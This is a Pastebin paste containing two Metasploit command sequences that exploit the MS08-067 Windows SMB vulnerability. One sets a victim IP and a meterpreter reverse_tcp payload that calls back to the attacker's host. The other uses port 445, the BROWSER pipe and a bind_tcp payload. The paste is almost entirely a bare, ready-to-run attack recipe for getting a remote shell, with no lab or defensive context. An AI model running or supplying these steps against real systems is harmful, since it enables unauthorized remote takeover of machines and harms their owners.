Advertisement
ChristianBarzalobre

ms08_067_netapi

Jun 4th, 2019
65
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.43 KB | None | 0 0
  1. msfconsole
  2. use exploit/windows/smb/ms08_067_netapi
  3. show options
  4. set RHOST (IP Victima)
  5. show targets
  6. set target 1
  7. set payload windows/meterpreter/reverse_tcp
  8. set LHOST (IP se ejecuta exploit)
  9. show options
  10. exploit
  11.  
  12. msfconsole
  13. search netapi
  14. use exploit/windows/smb/ms08_067_netapi
  15. set LHOST (IP se ejecuta exploit)
  16. set RHOST (IP Victima)
  17. set RPORT 445
  18. set SMBPIPE BROWSER
  19. set payload windows/meterpreter/bind_tcp
  20. exploit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement